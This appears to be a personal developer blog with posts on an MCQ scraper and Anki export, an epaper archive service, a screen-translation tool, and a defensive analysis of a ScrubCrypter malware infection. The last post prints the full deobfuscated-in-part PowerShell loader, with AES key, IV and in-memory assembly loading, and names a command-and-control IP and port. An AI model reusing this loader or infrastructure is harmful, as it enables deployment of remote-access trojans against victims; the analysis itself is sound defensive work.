CodeWorth

Wednesday, May 29, 2024

MCQ Scraper

This is a simple .NET 8 console application that scrapes MCQs from different online sources and consolidates them into a single SQLite DB. Check the schema of the table in the attached picture below.

Currently, it only collects Civil Engineering-related questions from IndiaBix for a select few categories, but this can be extended to other sources as well.

The program itself is pretty brittle in its current state - no allowance has been made for exceptions that I didn't encounter during development. Logging is a pretty basic custom implementation as well, and it was an afterthought (the log file is opened and written to every time a new line is logged, so be sure to disable it if you feel it is hurting performance too much). Still, in its current form, the whole operation completed in a couple of minutes.

Regarding dependencies, it uses simple Regex matching when possible and also HtmlAgilityPack for parsing the scraped HTML pages into manageable DOMs for easier filtering.

The resulting output DB file is available here.

Console output from the program in action

Top few entries from the output DB

UPDATE (31 May, 2024):

I've worked a few improvements into the program and pushed the code changes to the repository. It can now also create Anki flashcards, so that the scraped content is actually useful. Just as importantly, the program has a bugfix/QoL enhancement: <img> tags are now checked for in the question texts/prompts as well - a possibility that I had ignored before - and the referenced images are downloaded, base64-encoded and replaced in place, ready for use in HTML as-is.
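The image handling described above can be sketched roughly as follows. This is a Python illustration rather than the program's actual C# code; the function name `inline_images`, the `fetch` callback and the fixed `image/png` MIME type are assumptions made for the example.

```python
import base64
import re
from typing import Callable

# Captures the part before the URL, the URL itself, and the closing quote.
IMG_SRC = re.compile(r'(<img\b[^>]*?\bsrc=["\'])([^"\']+)(["\'])', re.IGNORECASE)


def inline_images(html: str, fetch: Callable[[str], bytes], mime: str = "image/png") -> str:
    """Replace every <img src="..."> URL with a base64 data URI.

    `fetch` is a hypothetical callback that downloads a URL and returns bytes;
    keeping it as a parameter lets the sketch run without network access.
    """
    def swap(match: re.Match) -> str:
        src = match.group(2)
        if src.startswith("data:"):
            return match.group(0)  # already inlined, leave untouched
        encoded = base64.b64encode(fetch(src)).decode("ascii")
        return f"{match.group(1)}data:{mime};base64,{encoded}{match.group(3)}"

    return IMG_SRC.sub(swap, html)


if __name__ == "__main__":
    fake_fetch = lambda url: b"\x89PNG"  # stand-in for a real download
    print(inline_images('<p>Q1 <img src="/images/q1.png"></p>', fake_fetch))
```

A real implementation would also pick the MIME type from the file extension or the response headers instead of assuming PNG.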

For the past day or two, I was wondering if I should create a separate app (I was thinking maybe a Vue-powered SPA) to actually make use of the DB; but a couple of hours' worth of internet research led me to believe that it would be a lot more efficient to make this DB available to Anki instead of reinventing the wheel all over again. Oh, and this apparently really popular app was first brought to my attention by ChatGPT-4o when I asked it "what is the best strategy to memorize around 4500 mcqs for a competitive exam?" Anki was literally the first option in the list it returned, where it suggested using it as a Spaced Repetition System (SRS) for "active learning". I had to download and play around with it for a bit before I could actually understand its workings.

I also searched for any and all add-ons the Anki community had for Multiple Choice Questions and tried one or two of them. But I didn't really like them too much - and I didn't know how I could export the questions from the DB to a form that these add-ons would understand either. So, taking the advice of a wise Reddit user somewhere, I just ditched the idea of using any sort of add-on altogether for MCQs and began exploring the import and export format used by Anki. It turned out that the program can import/export in a few different formats but I chose the simple plaintext format for obvious reasons and studied its structure. I created a new default deck - a term I have gathered means a collection of cards sharing some similarity; so in this case, a deck can represent a category such as building-materials or surveying. Then I created two cards manually from inside Anki, each one following the pattern of the question prompt and the multiple options on the front side and the answer on the back side of the card. This is also where I learned that Anki has first-class support for HTML content in its flashcards, which was perfect for me since I didn't have to worry about all the tags in my scraped questions and options, not to mention the <img> tags.

Anyway, then I exported the cards from Anki's File menu (still not sure if it exports just a single deck or all of them to the same file) to a plaintext file and studied the structure of the exported file. It was really intuitive, and I figured it would be easy enough to automate the conversion of the questions from my scraped DB to this format that Anki understood (I had also successfully tried externally modifying the export file and importing it back into Anki, without any hiccup). So, that's what I did. I simply added a class library project to the Visual Studio solution and added in the functionality to produce ready-to-import Anki plaintext files from the SQLite DB produced by MCQer. And voila:

The *.txt files are the import-ready Anki plaintext files produced by our program

Confirming an import in Anki

Browsing the imported deck of cards (notice the images)

Another file, another deck of cards imported

A flashcard, when in action
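For readers who want to try the DB-to-Anki conversion described in this update, here is a minimal sketch in Python (the real program is a C# class library). The table name `mcq` and its columns are hypothetical, since the actual schema is only shown in a picture. The `#separator:tab` and `#html:true` header lines are what recent Anki versions write at the top of a plaintext export; treat them as an assumption if you are on an older version.

```python
import sqlite3


def to_anki_lines(rows):
    """Turn (question, options, answer) tuples into Anki plaintext lines."""
    lines = ["#separator:tab", "#html:true"]
    for question, options, answer in rows:
        # Front: prompt followed by the options; back: the answer.
        front = question + "<br><br>" + "<br>".join(options)
        fields = [front, answer]
        # Tabs and newlines would break the one-note-per-line layout.
        clean = [f.replace("\t", " ").replace("\r", "").replace("\n", "<br>") for f in fields]
        lines.append("\t".join(clean))
    return lines


def export_category(conn, category):
    """Read one category from the (hypothetical) mcq table and format it."""
    cursor = conn.execute(
        "SELECT question, option_a, option_b, option_c, option_d, answer "
        "FROM mcq WHERE category = ?",
        (category,),
    )
    rows = []
    for question, a, b, c, d, answer in cursor:
        options = [f"A. {a}", f"B. {b}", f"C. {c}", f"D. {d}"]
        rows.append((question, options, answer))
    return to_anki_lines(rows)


if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE mcq (category TEXT, question TEXT, option_a TEXT, "
        "option_b TEXT, option_c TEXT, option_d TEXT, answer TEXT)"
    )
    conn.execute(
        "INSERT INTO mcq VALUES ('surveying', 'Sample question?', "
        "'one', 'two', 'three', 'four', 'B')"
    )
    print("\n".join(export_category(conn, "surveying")))
```

Writing one file per category maps naturally onto one deck per category at import time.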

Sunday, February 4, 2024

Gorkhapatra By Date

I used to visit the official Gorkhapatra epaper site and download the latest epaper to see if there were any PSC vacancies, up until a few months ago. I eventually stopped doing that, but until then, for about two years, every day, I downloaded the daily epaper and uploaded it to DriveHQ. I had managed to exhaust two entire accounts' worth of storage with just Gorkhapatra pdf's. One thing I felt was lacking in the site was the ability to download epapers older than 1 week, and the system was generally clunky and unreliable. So, this is why Gorkhapatra By Date was conceived.

Initially I had thought that I had to save the actual pdf's, because I wasn't sure the links would be valid past the 1-week-old mark but as I've learned in the past two weeks of developing this service, they are. So, I decided to just save the available links and do away with downloading the actual files.

Architecture-wise, the service is really simple. It's made up of two parts, one of which is just a CodeIgniter-based API server that retrieves the link to the epaper for the requested date, if present of course, from a table in the database. It also has another endpoint that simply lists the available dates. The links themselves are scraped from the original epaper site using a simple PHP script running as a cron job every 6 hours and the table is updated with any new link available. The script could technically be run just once a day typically a few tens of minutes past 12 AM (I've observed over the years that that's around the most likely time of upload of the day's paper to the site, though not always) but I've learned not to rely on this pattern.

The cron script doesn't just scrape the links and blindly insert them into the DB's table either. The original links present on the site are not direct links to the pdf's. However, the direct links are readily available with some simple URL string manipulation, so the script does that as well.

Also, since we need to be sure which date the pdf belongs to, we cannot just rely on the file name of the pdf (which is supposed to be a combination of the English and the Nepali dates of the day, but is very often wrong). As a solution, we actually download the contents of the pdf's and parse them (using smalot's pdf parser library for PHP) and obtain their metadata. Even after going through all this, the date specified in the metadata isn't always reliable. So, we perform a regex pattern matching on the first page of the pdf's after they've been parsed by the library. Only then do we have a reliable date for each file (unless the pattern of date printed in the pdf changes as well, in which case, we'll need to update our regex).

The parsing itself turns out to be really CPU-intensive (the script finished parsing 8 pdf's comfortably within a minute on my local machine while it easily took 25-30 on my shared hosting server) but memory is where I hit a wall. Turns out, one of the pdf's was 22 pages long, and a simple memory_get_usage() call logged right after the call to the parser revealed that the script was eating up ~170MB of memory for that file. My shared hosting config was set to 128MB per script, so, as was expected, the script crashed upon reaching this particular pdf among the scraped list of 8: "Fatal Error: Allowed Memory Size of 134217728 Bytes Exhausted ...". Turns out, in a shared hosting environment, modifying the php.ini file isn't possible. Thankfully, cPanel did have a page where I could change a bunch of different parameters for PHP, including memory_limit, which was initially set to 128MB and which I promptly set to 512MB (the same as my development environment in XAMPP). Side note: I learnt after much back and forth with the hosting support that the change from cPanel modifies, to my utter befuddlement initially, not the php.ini file (which, as they pointed out, is global across the server and is set to 128MB) but the httpd.conf file (which is separate for each user account on the server), which has precedence over the php.ini file. I learned that the memory limit set inside a script has the highest precedence, then the httpd.conf file, and only then php.ini. I also learned about the php --ini and php --info commands and the phpinfo() function. The first one tells you where the php.ini file that the currently installed PHP binary is configured to use is located. The second one gives you info about the actual PHP configuration, including memory_limit, and the third one is just the PHP function to do the same. Neat stuff.

Okay, once we have the date and the link for all available epapers we scraped (usually 8), we just insert them to the table and let MySQL handle the duplicates.
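Letting the database handle duplicates usually means putting a unique key on the date and using an insert that skips rows which already exist. The sketch below shows the idea with Python's built-in sqlite3 and `INSERT OR IGNORE` as a stand-in so that it runs anywhere; on MySQL the counterpart would be a UNIQUE key combined with `INSERT IGNORE` or `ON DUPLICATE KEY UPDATE`. The table and column names are hypothetical, and the post doesn't say which MySQL variant the service actually uses.

```python
import sqlite3


def save_links(conn, scraped):
    """Insert (date, url) pairs, silently skipping dates already stored.

    Returns the number of rows that were actually new.
    """
    conn.execute(
        "CREATE TABLE IF NOT EXISTS epapers ("
        "paper_date TEXT PRIMARY KEY, "  # the unique key does the de-duplication
        "url TEXT NOT NULL)"
    )
    before = conn.total_changes
    conn.executemany(
        "INSERT OR IGNORE INTO epapers (paper_date, url) VALUES (?, ?)",
        scraped,
    )
    conn.commit()
    return conn.total_changes - before


if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    first_run = [("2024-02-01", "https://example.invalid/a.pdf"),
                 ("2024-02-02", "https://example.invalid/b.pdf")]
    second_run = [("2024-02-02", "https://example.invalid/b.pdf"),
                  ("2024-02-03", "https://example.invalid/c.pdf")]
    print(save_links(conn, first_run), save_links(conn, second_run))
```

Because the cron job re-scrapes the same week of papers every 6 hours, most rows in each run are duplicates, so pushing the check into the database keeps the script itself free of lookup logic.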

The front end is hosted on the main domain (ajashra.com) while the API server resides in a subdomain (api.ajashra.com), so the API server needs to allow CORS with the Access-Control-Allow-Origin header set to "https://ajashra.com". This was new for me and it took about half a day to fully iron out using the "before" filter feature in CodeIgniter4. Some cool stuff I learned there. The Same Origin Policy that necessitated this is only enforced by web browsers, so, while calling the API from front-end code from an origin other than the main domain will fail, the API still works for any non-web-browser consumer.
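The CORS behaviour described above can be modelled in a few lines. This is a framework-free Python sketch, not the CodeIgniter4 filter itself; `handle_request` and its return shape are made up for the illustration.

```python
ALLOWED_ORIGIN = "https://ajashra.com"


def handle_request(request_headers, body="[]"):
    """Return (status, headers, body) for an API call.

    The response is produced regardless of who is asking; the CORS header
    only tells a *browser* whether page scripts may read that response.
    """
    response_headers = {"Content-Type": "application/json"}
    if request_headers.get("Origin") == ALLOWED_ORIGIN:
        response_headers["Access-Control-Allow-Origin"] = ALLOWED_ORIGIN
        response_headers["Vary"] = "Origin"  # caches must key on the Origin header
    return 200, response_headers, body


if __name__ == "__main__":
    # Browser on the main site: header present, so the front end may read the data.
    print(handle_request({"Origin": "https://ajashra.com"}))
    # Browser on some other site: no header, so the browser blocks the script.
    print(handle_request({"Origin": "https://elsewhere.example"}))
    # curl or a cron job sends no Origin and simply receives the body.
    print(handle_request({}))
```

All three calls get a 200 and the body; only the browser cases differ in whether front-end code is allowed to see it.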

The JS library - "Vanilla Calendar" was used for the front-end to present an intuitive calendar interface where a user can see which dates are available for download. Clicking on any available date on the calendar directly leads to the corresponding epaper being downloaded.

Here's the URL for the service.

Wednesday, September 6, 2023

ScreenTranslator

At work, I have to work with QQ, an Instant Messaging program and it's got an International version and a Chinese version. For the Chinese version of the app, I mostly have to rely on Google Lens to translate the UI to English.

So, about 3-4 days ago, I thought why not make a desktop program to do the translation instead of having to open Google Lens on my phone every time I want to make sense of a weird menu item in QQ's UI. So, this is my attempt at that. All it does is it iterates through the automation/accessibility elements in the app, gets English translations for each of the elements' texts and creates an overlay window with the translated text right over them. I first wanted to use Google's Translate API but that seems to require a credit card even for the free tier, so I settled for a free API that uses LibreTranslate. The translations are not as good as Google Translate but one can make out the meaning with some deliberation.

UI of the program

UI of the program during the translation process

QQ's menu before translation

QQ's menu after translation

The operation of the program is simple: middle-click on any window to translate the texts in it. Move your cursor to the top left corner of your screen to remove all translation overlays.

The program doesn't work for entire webpages because webpages tend to have a lot of elements (in my case with multiple tabs open with one being a Chinese site, I counted over 10k elements) to process. The C# library I've used here for automation elements extraction simply doesn't care for a large number of elements and simply returns empty. It should work in scenarios dealing with a limited number of elements such as software programs with their UI in a foreign language.

Here's the GitHub repo and here's the release

Here's the MDD:

Musings During Development of ScreenTranslator:
------------------------------------------------

Don't ever create Forms on multiple threads. Use the main UI thread for all your window needs. You'll save a lot of headaches this way. I'd tried creating each translation overlay in its own thread but faced problems such as residual windows when the thread they were created in was aborted (meaning I would have to interact with the overlays to get rid of them), a design problem regarding how to best close the overlay windows (abort the threads they were created in or make the overlay forms themselves listen to a flag?; do I create a new window using .Show() followed by Application.Run() or .ShowDialog()? and why? - at any rate, when the thread was aborted externally, the ThreadAbortException would only be triggered inside each thread when the cursor was placed over its overlay, not immediately), some translations being randomly missed for whatever reason, and so on.
Just do whatever processing actually made you take the multi-threading route in different thread(s) and leave the UI/form creation logic to the main UI thread. this.Invoke() and this.BeginInvoke() are your friends. All of the problems that I described above went POOF when I did that. Countless StackOverflow posts recommend against creating forms on separate threads, and not without reason. If you're creating forms in separate threads, re-think your design. You will probably make it far simpler and solve most of your problems by leaving UI operations (that includes new form creation) to the main UI thread.
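The shape of that design, with workers doing the slow part and a single thread owning everything UI-related, can be illustrated without any GUI toolkit. The Python sketch below is only an analogy for the WinForms Invoke()/BeginInvoke() pattern: a queue plays the role of the message loop, a dict stands in for an overlay form, and `translate` is a placeholder for the real translation call.

```python
import queue
import threading


def translate(text):
    """Placeholder for the slow, thread-safe work (e.g. a translation request)."""
    return text.upper()


def build_overlays(texts):
    """Translate on worker threads, but 'create overlays' only on the caller's thread."""
    results = queue.Queue()

    def worker(text):
        # Workers never touch UI objects; they only hand results back.
        results.put((text, translate(text)))

    threads = [threading.Thread(target=worker, args=(t,)) for t in texts]
    for thread in threads:
        thread.start()

    overlays = []
    for _ in texts:
        original, translated = results.get()
        # This runs on the calling (UI) thread, like code passed to BeginInvoke().
        overlays.append({
            "source": original,
            "text": translated,
            "created_on": threading.current_thread().name,
        })

    for thread in threads:
        thread.join()
    return overlays


if __name__ == "__main__":
    for overlay in build_overlays(["file", "edit", "view"]):
        print(overlay)
```

Every overlay ends up created by the same thread, so closing them all later is a plain loop instead of a thread-abort problem.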

.NET's form's TopMost property is crap, like a lot of other things (Automation API comes to mind cuz it's also sth I've used in this project - or I should say, I've avoided in favor of the native automation API wrapper - CUIAutomation). Just use the native Win32 API: SetWindowPos() with the right params for it.

September 4, 2023 | 08:24 PM
-----------------------------
During automation tree iteration, you won't see what's not visible. I was trying to get all descendants of a web browser (firefox) to see if my tool worked to translate entire webpages but it didn't work. In the investigation, I found out that the CUIAutomation library was flat returning null for the FindAll() method when given the IUIAutomationElement returned from a call to ElementFromHwnd() (with the Hwnd obtained by the WindowFromPoint() API applied to the value returned by GetCursorPos()). To investigate what was happening, I opened Spy++ to see if I was getting the right hwnd and I found that the hwnd I had obtained from WindowFromPoint() was a child of a parent hwnd for firefox. I then got the parent hwnd for it and tried FindAll() with descendants as the treescope but I was still getting empty or null results. Then I thought to myself that the CUIAutomation library must be at fault here, after all, FindAll() with descendants is a very taxing operation, as suggested by MSDN. So, I made a fully functional program for the same in C++:
`
#include <iostream>
#include <string>
#include <vector>
#include <Windows.h>
#include <UIAutomationClient.h>

// Link with ole32.lib and oleaut32.lib.
IUIAutomation* g_pAutomation = nullptr;

void doItFaster();
std::vector<IUIAutomationElement*> GetDescendants(IUIAutomationElement* element);
std::vector<IUIAutomationElement*> GetChildren(IUIAutomationElement* parentElement);

int main()
{
    std::cout << "Hello World!\n";
    doItFaster();
}

void doItFaster() {
    HRESULT hrInit = CoInitialize(NULL);
    if (hrInit != S_OK && hrInit != S_FALSE) {
        return;
    }

    HRESULT hr = CoCreateInstance(__uuidof(CUIAutomation), NULL, CLSCTX_INPROC_SERVER,
                                  __uuidof(IUIAutomation), (void**)&g_pAutomation);
    if (FAILED(hr) || g_pAutomation == nullptr) {
        CoUninitialize();
        return;
    }

    // Hard-coded handle of the Firefox window for this debugging session.
    HWND hWndFirefox = (HWND)0x0006009E;
    IUIAutomationElement* pBrowserElement = nullptr;
    if (g_pAutomation->ElementFromHandle((UIA_HWND)hWndFirefox, &pBrowserElement) == S_OK) {

        auto leafElements = GetDescendants(pBrowserElement); // watch this

        std::vector<std::wstring> leafElementNames;
        for (auto leafElement : leafElements) {
            BSTR name = NULL;
            if (leafElement->get_CurrentName(&name) == S_OK && name != NULL) {
                leafElementNames.push_back(std::wstring(name, SysStringLen(name))); // and this
                SysFreeString(name); // the BSTR is owned by the caller
            }
        }

        int x = 0; // bp here
        // Note: the collected elements are never Release()d; fine for a
        // throwaway debugging tool, not for long-running code.
    }
}

// Recursively collects the leaf elements (elements without children) under `element`.
std::vector<IUIAutomationElement*> GetDescendants(IUIAutomationElement* element)
{
    std::vector<IUIAutomationElement*> leafElements;

    auto children = GetChildren(element);

    if (children.size() == 0) { // this is a leaf element
        leafElements.push_back(element);
    }
    else {
        for (auto child : children)
        {
            auto descendants = GetDescendants(child);
            leafElements.insert(leafElements.begin(), descendants.begin(), descendants.end());
        }
    }

    return leafElements;
}

// Returns the immediate children of `parentElement`.
std::vector<IUIAutomationElement*> GetChildren(IUIAutomationElement* parentElement) {
    std::vector<IUIAutomationElement*> retval;

    IUIAutomationCondition* trueCondition = nullptr;
    if (g_pAutomation->CreateTrueCondition(&trueCondition) != S_OK) {
        return retval;
    }

    IUIAutomationElementArray* children = nullptr;
    if (parentElement->FindAll(TreeScope_Children, trueCondition, &children) == S_OK && children != nullptr) {
        int numberOfChildren = 0;
        if (children->get_Length(&numberOfChildren) == S_OK) {
            for (int i = 0; i < numberOfChildren; i++) {
                IUIAutomationElement* child = nullptr;
                if (children->GetElement(i, &child) == S_OK) {
                    retval.push_back(child);
                }
            }
        }
        children->Release();
    }
    trueCondition->Release();

    return retval;
}
`
It was only after doing all this that I realized what was actually happening: the web browser needed to be almost completely visible, i.e. not blocked by any other window, for the element extraction to work. My Visual Studio 2019 IDE was most definitely blocking the browser window while the program was running.
ref: https://stackoverflow.com/questions/69122441/uiautomation-missing-to-catch-some-elements
There's no need to write my own custom FindAll descendants method like I did with recursion in the C++ version above. The built-in FindAll() with descendants treescope will work just fine. I only did what I did because I thought the stack was overflowing or something.
Also, the hwnd to be used for the parent element to do FindAll() is not what's available by WindowFromPoint(). You need to get the absolute parent window of the output of that API call to be sure. It might work for apps such as QQ (in my case, it worked perfectly fine with QQ but it clearly didn't, when I tried translating a Chinese website, which is what led to all of this) but doesn't work for all windows, especially web browsers.

September 5, 2023 | 03:39 PM
----------------------------
Turns out, the FindAll() method provided by the IUIAutomation C# NuGet package doesn't give results (i.e. gives a 0-length IUIAutomationElementArray) if there's a large number of elements. I tried parsing a Firefox window browsing csdn.com - a Chinese-language site - and the C++ code above (my own version of FindAll() for getting all descendants) took around 30s but returned over 10k elements. I then did FindAll() with the tree scope of descendants in C# for the same hwnd/element and it immediately returned with a length of 0 (not null, but an IUIAutomationElementArray with length 0). Maybe porting the C++ version of GetDescendants() to C# by manually recursing through all immediate children would work for C# as well but I'm not going to do it. Just don't use it on websites.
For Brave browser with my outlook open on a tab, both the default FindAll() descendants in C# and the C++ version work just fine and there's around 370 elements.

September 6, 2023 | 11:50 AM
------------------------------
https://stackoverflow.com/questions/13225841/starting-application-on-start-up-using-the-wrong-path-to-load
When running on user logon (via HKCU Run entry), the working directory is not the application exe location. So, file paths that haven't been fully qualified don't work.
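The usual fix is to resolve every relative path against the application's own folder instead of the current working directory. Here is a small Python sketch of that idea; the helper names are made up, and in a C# program like this one the base folder would typically come from something like AppDomain.CurrentDomain.BaseDirectory instead.

```python
import os
import sys


def app_dir():
    """Folder containing the running script/executable, independent of the cwd."""
    return os.path.dirname(os.path.abspath(sys.argv[0]))


def resource_path(name, base=None):
    """Build a fully qualified path for a file that ships next to the program."""
    return os.path.join(base or app_dir(), name)


if __name__ == "__main__":
    # A bare relative name depends on wherever the launcher started the process.
    print("cwd-relative :", os.path.abspath("settings.json"))
    # This one stays the same no matter which directory the process starts in.
    print("app-relative :", resource_path("settings.json"))
```

Computing the base folder once at startup and passing it around also makes the difference easy to test, since `base` can be overridden.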

Thursday, July 13, 2023

ScrubCrypter malware analysis

I was at my desk at the office. Must have been around 12 or 12.30 PM, July 12, 2023. Suddenly, Windows Defender showed a “Threat found” alert. That immediately drew my attention. I checked to see which file it had detected and noticed it was a “udgbQ.vbs” file inside %appdata% that Defender had tagged. Of course, once I got to the folder, I saw Defender immediately remove it from there. If I remember correctly, it was just a 1 KB file – I couldn’t get a look into its contents. However, I also saw two more files – “udgbQ.bat.exe” and “udgbQ.bat” :

(Read after finishing the article: Of note here is that at first, the exe file wasn’t visible even when the “Show hidden files” option in Windows Explorer was checked. But Process Hacker was reporting that such a process was already running and when asked to go to the file path of the process, it would take me right to %appdata%, with no trace of the exe file – only the bat file could be seen. I then surmised from CurrPorts’ Process Attributes value of “AHS” that it must have been set to be an Archived Hidden System file. So I did an “attrib -s -h -a -r *.*” in the folder and the exe file finally showed. The attrib trick is from the good old days of virus hunting in Windows XP when I was in school – something that my Computer Science teacher had told us.)

I went into panic mode. I opened up the contents of the rather large bat file and it was a load of gibberish. I’ve included in this folder the same file as a .txt file (“udgbQ.bat.txt”) so that it’s not executed accidentally. Anyway, its content looks like the following:

Lines 2 through 7 and the final line 9 are legible. This batch script basically runs a powershell instance hidden and copies the legit powershell binary to its folder with its own name with an “.exe” appended, then it calls the copied powershell binary with a huge commandline argument (the call "%p%" %U:uLqiO=% line’s %U:uLqiO=% variable resolves into the correct argument because of the huge “set” command of line 8).

I tried figuring out what this mangled content would resolve into manually but I had also fired up Process Hacker by then and when I took a look at the commandline for the “udgbQ.bat.exe” process that was now running, it was already in plaintext:

First, I suspended the process after realizing it had already established a connection to the following:

Remote address: 51.77.167.52

Remote host name: ip52.ip-51-77-167.eu

Remote port: 6060

Local port: 63421

Protocol: TCP

(I made this observation using the Nirsoft program “CurrPorts”). I then looked into the commandline passed to this weirdly named powershell binary. The commandline was the following:

$oIou='InnJKbvonJKbknJKbenJKb'.Replace('nJKb', '');$AzqP='EnnJKbtrnJKbyPonJKbinJKbntnJKb'.Replace('nJKb', '');$LWEJ='ChnJKbannJKbgenJKbEnJKbxtenJKbnsnJKbionnJKb'.Replace('nJKb', '');$Jwxg='TranJKbnsnJKbfnJKbormnJKbFinnJKbanJKblBlnJKbocknJKb'.Replace('nJKb', '');$pWwA='LoadnJKb'.Replace('nJKb', '');$eDxq='CreanJKbtnJKbeDnJKbecnJKbrypnJKbtnJKbornJKb'.Replace('nJKb', '');$DtTM='MnJKbainJKbnnJKbMonJKbdnJKbulenJKb'.Replace('nJKb', '');$JZlt='SpnJKblinJKbtnJKb'.Replace('nJKb', '');$xzWC='GnJKbetCnJKburnJKbrnJKbennJKbtPnJKbrocnJKbesnJKbsnJKb'.Replace('nJKb', '');$aZrq='FnJKbronJKbmnJKbBnJKbasenJKb64nJKbStrnJKbingnJKb'.Replace('nJKb', '');$zerm='FirnJKbstnJKb'.Replace('nJKb', '');$euof='ReanJKbdnJKbLinJKbnnJKbesnJKb'.Replace('nJKb', '');function SHmms($fIyrX){$OXHzj=[System.Security.Cryptography.Aes]::Create();$OXHzj.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OXHzj.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OXHzj.Key=[System.Convert]::$aZrq('Ku4UyUqCrVKpr817sKewP+3V+wWyOhyCkaqfyyShZ9E=');$OXHzj.IV=[System.Convert]::$aZrq('6ttlhKwyOYtu8WT6FBC9HQ==');$RRNwL=$OXHzj.$eDxq();$jXMSp=$RRNwL.$Jwxg($fIyrX,0,$fIyrX.Length);$RRNwL.Dispose();$OXHzj.Dispose();$jXMSp;}function ODGMY($fIyrX){$nYjJX=New-Object System.IO.MemoryStream(,$fIyrX);$fmBrg=New-Object System.IO.MemoryStream;$lLnxw=New-Object System.IO.Compression.GZipStream($nYjJX,[IO.Compression.CompressionMode]::Decompress);$lLnxw.CopyTo($fmBrg);$lLnxw.Dispose();$nYjJX.Dispose();$fmBrg.Dispose();$fmBrg.ToArray();}$KawWa=[System.Linq.Enumerable]::$zerm([System.IO.File]::$euof([System.IO.Path]::$LWEJ([System.Diagnostics.Process]::$xzWC().$DtTM.FileName, $null)));$RIswh=$KawWa.Substring(3).$JZlt(':');$qTCRy=ODGMY (SHmms ([Convert]::$aZrq($RIswh[0])));$DWMcP=ODGMY (SHmms ([Convert]::$aZrq($RIswh[1])));[System.Reflection.Assembly]::$pWwA([byte[]]$DWMcP).$AzqP.$oIou($null,$null);[System.Reflection.Assembly]::$pWwA([byte[]]$qTCRy).$AzqP.$oIou($null,$null);

This was better than what was in the bat file but still not entirely obvious. I tried a bunch of things including manually cleaning up the .Replace() calls and separating out the semicolon-delimited statements for better readability, and tried CyberChef as well, but finally settled on just pasting the whole thing into Visual Studio Code, saving it as a .ps1 file (after realizing it’s a powershell script) and formatting the file using VS Code’s PowerShell extension. It got a lot cleaner and looked a lot more like a normal powershell script. I didn’t want to do the .Replace() calls on my own, so I just added a breakpoint after all the .Replace() calls and simply hovered my cursor above the variables to get what they resolved to. Eventually, I manually replaced all the variables with their resolved string values as follows:

(Note that I’ve modified line 42 to use a valid path to the .exe file)

This script file has also been included in the same folder as this document.
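The .Replace() clean-up can also be done statically, without running any part of the sample. The following Python sketch is not what was done during the analysis (that used the VS Code debugger); it simply pattern-matches the `$name='...'.Replace('x', '')` assignments and applies the replacement. The three sample assignments are copied from the command line above.

```python
import re

# Matches: $name='obfuscated'.Replace('junk', 'replacement')
ASSIGNMENT = re.compile(r"\$(\w+)='([^']*)'\.Replace\('([^']*)',\s*'([^']*)'\)")


def resolve_replace_calls(script):
    """Map each variable name to the string its .Replace() call evaluates to."""
    return {
        name: value.replace(old, new)
        for name, value, old, new in ASSIGNMENT.findall(script)
    }


SAMPLE = (
    "$oIou='InnJKbvonJKbknJKbenJKb'.Replace('nJKb', '');"
    "$AzqP='EnnJKbtrnJKbyPonJKbinJKbntnJKb'.Replace('nJKb', '');"
    "$aZrq='FnJKbronJKbmnJKbBnJKbasenJKb64nJKbStrnJKbingnJKb'.Replace('nJKb', '');"
)

if __name__ == "__main__":
    for name, value in resolve_replace_calls(SAMPLE).items():
        print(f"${name} -> {value}")
```

With the names resolved, a call such as `[System.Convert]::$aZrq(...)` reads as `[System.Convert]::FromBase64String(...)`, which is what makes the rest of the script legible.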

I stepped through the code in VS Code, careful not to actually run whatever it is trying to run (I’ve commented out the final two lines of this file that actually Invoke the two payloads) and let VS Code and PowerShell do all the decrypting and what have you. I also added code to dump the payloads as .bin files.

So, recapitulating the situation as a whole, the .bat file itself contains the compressed, encrypted and base64’ed version of the contents of the two payloads separated by a colon ‘:’ towards the beginning of the file and also contains the batch script that instructs powershell to get these two payloads and execute them. All of that information in just one file! That’s really cool.
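The unpacking order implied by the PowerShell command line (take the first line of the file, skip 3 characters, split on ':', then base64-decode, AES-decrypt and gunzip each part) can be sketched in Python as below. Python's standard library has no AES, so the decryption step is passed in as a function; with a third-party crypto library it would be AES-CBC with PKCS7 padding using the Key and IV visible in the command line. The 3-character prefix used in the demo is an assumption, since the script only shows that 3 characters are skipped.

```python
import base64
import gzip


def extract_payloads(first_line, decrypt):
    """Recover the two embedded payloads from the first line of the .bat file.

    `decrypt` is a caller-supplied function (bytes -> bytes) standing in for
    the AES-CBC decryption performed by the script's SHmms function.
    """
    parts = first_line[3:].split(":")  # mirrors .Substring(3).Split(':')
    payloads = []
    for part in parts[:2]:
        encrypted = base64.b64decode(part)
        compressed = decrypt(encrypted)
        payloads.append(gzip.decompress(compressed))  # mirrors the ODGMY function
    return payloads


if __name__ == "__main__":
    # Build a harmless stand-in line; "encryption" here is the identity function.
    def pack(data):
        return base64.b64encode(gzip.compress(data)).decode("ascii")

    fake_line = ":: " + pack(b"first payload") + ":" + pack(b"second payload")
    print(extract_payloads(fake_line, decrypt=lambda blob: blob))
```

Splitting on ':' is safe because the base64 alphabet never contains a colon, which is presumably why the malware author chose it as the separator.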

Anyway, I managed to dump the first payload (decompressed ~1.2 MB) and Windows Defender and Avira (at this point, I’d already hurriedly installed the best free AV solution I know - Avira Antivirus) immediately picked it up. I disabled them for a moment and asked what VirusTotal thought of it:

Here’s the scan link.

Running Exe Info PE on the payload revealed that it’s a .NET assembly, and running .NET Reflector on it suggests that it’s a .NET assembly likely crypted with ScrubCrypter :

The actual RAT or stealer or whatever it is, is encrypted and is going to be decrypted and loaded at runtime by this .NET crypter.

It is obvious from Reflector that this assembly is obfuscated. So, I used de4dot to deobfuscate it:

Though it says Unknown obfuscation, it produces a deobfuscated assembly and loading it up with dnSpy reveals that the deobfuscation works:

The class names and the methods and the variables are legible.

Now, I just place a breakpoint at line 31 (guessing the previous line returns the decrypted payload to a byte array) and just right click on the “rawAssembly” local variable and click Save and voila, I have the original payload. It is about 3.2 MB in size and Detect It Easy says the payload is a .NET Framework 4 executable as well:

VirusTotal is fairly certain that it is QuasarRAT:

Now, moving on to the next payload in the bat file (obtained by dumping the byte array inside the function call @ line 45 of the powershell script). This payload appears to be smaller – only about 15 KB. VirusTotal says it’s a Trojan named “Barys”:

I load it in dnSpy and see mangled names here as well, similar to the first payload, so I use de4dot on it to deobfuscate/clean it as far as possible (though it says the obfuscator is unknown here as well):

Here’s the payload loaded in dnSpy, both the original version and the cleaned version:

